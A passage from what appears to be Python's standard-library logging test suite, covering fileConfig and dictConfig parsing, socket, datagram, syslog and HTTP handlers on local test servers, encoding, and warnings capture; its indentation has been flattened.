keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
class myCustomFormatter:
def __init__(self, fmt, datefmt=None):
pass
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
